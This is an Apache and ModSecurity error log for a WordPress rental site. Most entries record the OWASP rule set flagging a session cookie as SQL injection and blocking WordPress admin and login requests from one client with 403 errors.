[Mon May 11 18:31:49.077533 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEdQ-Qm4vhlWBPlMjmDgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:49.704009 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEdQ-Qm4vhlWBPlMjmDgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:50.061494 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmEQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:50.061785 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmEQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:50.651426 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmEQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:50.763039 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmFAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:50.763346 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmFAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:51.390429 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEdg-Qm4vhlWBPlMjmFAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:51.486995 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEdw-Qm4vhlWBPlMjmFgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:51.487297 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEdw-Qm4vhlWBPlMjmFgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:51.891275 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEdw-Qm4vhlWBPlMjmFgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:52.355698 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEeDJnyuKVXoStDhbiAgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:52.356650 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEeDJnyuKVXoStDhbiAgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:53.879892 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEeDJnyuKVXoStDhbiAgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:53.976809 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEeTJnyuKVXoStDhbiCQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:53.977104 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEeTJnyuKVXoStDhbiCQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:54.591872 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEeTJnyuKVXoStDhbiCQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:54.859183 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEejJnyuKVXoStDhbiDQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:54.859487 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEejJnyuKVXoStDhbiDQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:55.479916 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEejJnyuKVXoStDhbiDQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:56.192430 2026] [autoindex:error] [pid 1411099:tid 1411123] [client 34.254.99.69:45952] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:31:56.195544 2026] [core:error] [pid 1411099:tid 1411123] [client 34.254.99.69:45952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:31:56.247355 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEfDJnyuKVXoStDhbiDwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:56.247640 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEfDJnyuKVXoStDhbiDwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:56.816620 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfDJnyuKVXoStDhbiDwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:56.952808 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEfDJnyuKVXoStDhbiEQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:56.953100 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEfDJnyuKVXoStDhbiEQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:57.507051 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfDJnyuKVXoStDhbiEQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:57.601295 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEfTJnyuKVXoStDhbiEwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:57.601573 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEfTJnyuKVXoStDhbiEwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:57.986270 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfTJnyuKVXoStDhbiEwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:58.220978 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEfjJnyuKVXoStDhbiFAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:58.221290 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEfjJnyuKVXoStDhbiFAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:58.837404 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfjJnyuKVXoStDhbiFAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:59.140025 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEfzJnyuKVXoStDhbiFgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:59.140322 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEfzJnyuKVXoStDhbiFgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:59.755139 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfzJnyuKVXoStDhbiFgAAAFM"], referer: https://rentparadise.fr/wp-login.php
